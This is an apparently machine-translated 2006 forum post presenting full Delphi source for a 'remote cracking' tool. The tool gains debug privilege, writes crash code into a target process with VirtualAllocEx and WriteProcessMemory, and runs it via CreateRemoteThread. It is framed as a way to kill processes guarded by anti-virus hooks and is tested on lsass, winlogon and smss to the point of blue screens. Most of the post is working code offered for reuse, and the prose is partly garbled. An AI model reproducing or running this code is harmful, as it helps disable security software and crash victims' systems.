[Paste From DFW] Remote brute-force cracking, alternative way to end the process (insert a Program)

Author:Stake Title:[Original] Remote brute-force cracking, alternative way to terminate the process (insert a Program) Keywords:End Process cracking Category:Personal Zone Confidentiality level:Public (Score:, reply: 3, read: 87 )»»

The old way to end the process is OpenProcess, and then TerminateProcess. However, if you encounter programs that Hook TerminateProcess and kernel-mode programs (such as many anti-virus software programs), you will be powerless. The final result of TerminateProcess is no change or your program will die directly... I have long thought about using other methods to end the process, for example, letting myself work in kernel mode... here is a very simple way to remotely crack the target program. To put it bluntly, it is to insert a thread to the target program, execute a piece of crash code, and let the target die from the internal. It is like throwing a bomb inside the target, so it is called remote cracking. Implementation principle: 1. First, how to crash the target program. I have encountered a program crash. Do you still remember how to write the code? (Who should remember the code that will crash?) I don't know how to write it. Let's tell you the simplest way. The starting address of CreateRemoteThread should be replaced by 0 directly, try to read and write the physical memory at 0. Is it the "0x00000000" memory referenced by the "0x00000000" command directly. The memory cannot be "read "., This is the goal. But for the sake of insurance, it is better to write a piece of code that will inevitably cause a crash. After all, it is more secure. In fact, the target program can be terminated without such violence. Do you still remember exitprocess? That is, the exit API that can only be used in your own program, just inject the address $7c81caa2 (for details, see the following ). This is like throwing a knife to someone else and letting him commit suicide... 2. There are many examples of injection threads, which are skipped here. Note that processes in kernel mode cannot run createremotethread at the same level. In addition, it is best to upgrade to the debug permission, otherwise do not want to remotely inject. Program Implementation: (all code is on the second floor) 1. enableddebugprivilege (true); // upgrade to debug permission. Copy Delphi to go deep into 2. Get the process ID and put it in SC _pid. Hremoteprocess: = OpenProcess (process_create_thread + {allow remote thread creation} Process_vm_operation + process_vm_write, {allow remote VM operations + allow remote VM write} False, SC _pid ); 3. Get the exitprocess address: ($7c81caa2 under XP) Pfnstartaddr: = getprocaddress (getmodulehandle ('kernel32'), 'exitprocess '); 4. In the old method, the remote thread from $7c81caa2 Hthread: = createremotethread (hremoteprocess, nil, 0, pfnstartaddr, nil, 0, tempvar ); Here, we can also combine step 3 and Step 4 to make it simpler. The second nil refers to the ExitProcess parameter. Anyway, we need to call ExitProcess (0), so nil is passed. After the execution, we can see that the dead QQ is closed without sound, and the wordalso is, but lsass.exe is not working, and ExitProcess does not respond at all. In this case, we can directly crack it. 5. Modify CreateRemoteThread HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, Pointer ($0), Pointer ($10000), 0, TempVar ); Target lsass.exe! Then uninstall lsass.exe-application error" The "0x00000000" memory referenced by the "0x00000000" command. The memory cannot be "read ". Then OpenProcess becomes invalid because lsass has been killed. However, the process in kernel mode such as smss.exe cannot be created directly using CreateRemoteThread. If hThread is not 0, run your program in kernel mode first. As a result, winlogin.exe spoolsv.exe services.exe is also cracked. Then there is a long-overdue blue screen... Note: Do not touch the system process. This is the blood I have gained from a dozen reboots! In this case, csrss.exe can read the 0 address and will not directly die. So try to implement the crash code by yourself, and let Windows tell us that "XXX needs to be closed when there is a problem. We are sorry for the inconvenience ." Right! Other common methods include using VirtualAllocEx to open a large space and WriteProcessMemory to write in the target program, provided that you have sufficient permissions. The complete program code is provided below. Create a console program, paste the code on the second floor, and run it! 2006-7-25 15:24:03   View comments »»» 15:42:25 complete insertthreads. DPR Program insertthreads; {If you have not understood the entire program, keep the following information: Remote Process blasting by wooden piles Original post address: http://www.delphibbs.com/keylife/iblog_show.asp? Xid = 23375 } {$ Apptype console} Uses Sysutils, windows; VaR inputs: string; SC _pid: integer; Tempvar: Cardinal; Hremoteprocess, hthread: thandle; D_proc_addr, pfnstartaddr: pointer; // Run the code of the remote process to be injected and the code will crash. Procedure kemthreads (); ASM Push 0 Pop eax // clear eax MoV ESI, eax // Si, Di to zero MoV EDI, eax @ Loop: Mov [eax], dword ptr eax // start random write memory, and then exit with an error Add eax, 4 Jmp @ Loop End; // Functions for permission escalation, copywriting Function EnabledDebugPrivilege (const bEnabled: Boolean): Boolean; Var HToken: THandle; Tp: TOKEN_PRIVILEGES; A: DWORD; Const SE_DEBUG_NAME = 'sedebugprivilege '; Begin Result: = False; If (OpenProcessToken (GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, hToken) then Begin Tp. PrivilegeCount: = 1; LookupPrivilegeValue (nil, SE_DEBUG_NAME, tp. Privileges [0]. Luid ); If bEnabled then Tp. Privileges [0]. Attributes: = SE_PRIVILEGE_ENABLED Else Tp. Privileges [0]. Attributes: = 0; A: = 0; AdjustTokenPrivileges (hToken, False, tp, SizeOf (tp), nil, ); Result: = GetLastError = ERROR_SUCCESS; CloseHandle (hToken ); End; End; Begin EnabledDebugPrivilege (True); // permission escalation Write ('Enter the target process pID: '); Readln (inputs ); SC _pID: = strtoint (inputs ); HRemoteProcess: = OpenProcess (PROCESS_CREATE_THREAD + {allow remote thread creation} PROCESS_VM_OPERATION + PROCESS_VM_WRITE, {allow remote VM operations + allow remote VM write} FALSE, SC _pID ); // Check hRemoteProcess to see if OpenProcess is successful .. // Open a memory space of $1000 D_Proc_Addr: = VirtualAllocEx (hRemoteProcess, nil, $1000, MEM_COMMIT, PAGE_READWRITE ); // Write the kemThreads () function If Not (WriteProcessMemory (hRemoteProcess, d_proc_addr, @ kemThreads, $800, TempVar) then Writeln ('writeprocessmemory write target process failed. ') Else Begin {Commented out here, demonstrating how to find the 'exitprocess' address // Find the function address // ExitProcess (kernel32) $7C81CAA2 // MessageBoxA (User32) $ 77D504EA PfnStartAddr: = GetProcAddress (GetModuleHandle ('kernel32'), 'exitprocess '); Write (format ('function address: $ % 0.8x', [integer (pfnStartAddr)]); } Writeln (''); TempVar: = 0; // Writeln (format ('write data at: % 0.8x', [integer (d_Proc_Addr)]); // Write complete, execute // HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, Pointer ($0), Pointer ($10000), 0, TempVar ); // This line is the fifth zero address brute-force attack. HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, d_Proc_Addr, nil, 0, TempVar); // run the kemThreads () function to write data. If hThread <= 0 then begin Writeln ('createremotethread failed to run the remote thread. '); End; End; Write ('execution completed '); readln (inputs); // press enter to end // VirtualFreeEx (hRemoteProcess, d_Proc_Addr, $1000, MEM_DECOMMIT ); CloseHandle (hRemoteProcess ); End.   15:43:03 attached the most streamlined ExitProcess method (but often cannot reach the end of the process results ...) Var inputs: String; SC _pID: integer; TempVar: Cardinal; HRemoteProcess, hThread: THandle; Begin EnabledDebugPrivilege (True); // permission escalation SC _pID :={ target process ID }; HRemoteProcess: = OpenProcess (PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION + PROCESS_VM_WRITE, FALSE, SC _pID ); HThread: = CreateRemoteThread (hRemoteProcess, nil, 0, Pointer ($7C81CAA2), nil, 0, TempVar ); Writeln ('thread inserted, ThreadID '+ inttostr (TempVar )); // CloseHandle (hRemoteProcess ); End;   2006-7-25 15:55:22 The above ExitProcess method is the simplest API call. Just put it in a button. Make sure to modify SC _pID :={ target process ID };! The above section Procedure kemThreads (); Asm Push 0 Pop eax // clear eax Mov esi, eax // si, di to zero Mov edi, eax @ Loop: Mov [eax], dword ptr eax // start random write memory, and then exit with an error Add eax, 4 Jmp @ Loop End; Not the best. Maybe you can find out more effective crash code. If you have any better ideas, please remember to reply! Now I am studying "Writing Secure Code (version 2nd)". If I find more malicious code, I will immediately post it out! (With the above collapse code, the vmwarevirtual machine has been tested, after smss.exe injection, direct blue screen After paying winlogin.exe, I was surprised to find that the shutdown button disappears, and only logout is left in the Start Menu. The options in the Task Manager are completely gray. Inserting lsass.exe does not cause any harm. The "shutdown" dialog box is displayed. After shutdown/a is canceled for half a minute, the blue screen unknow hard error ...)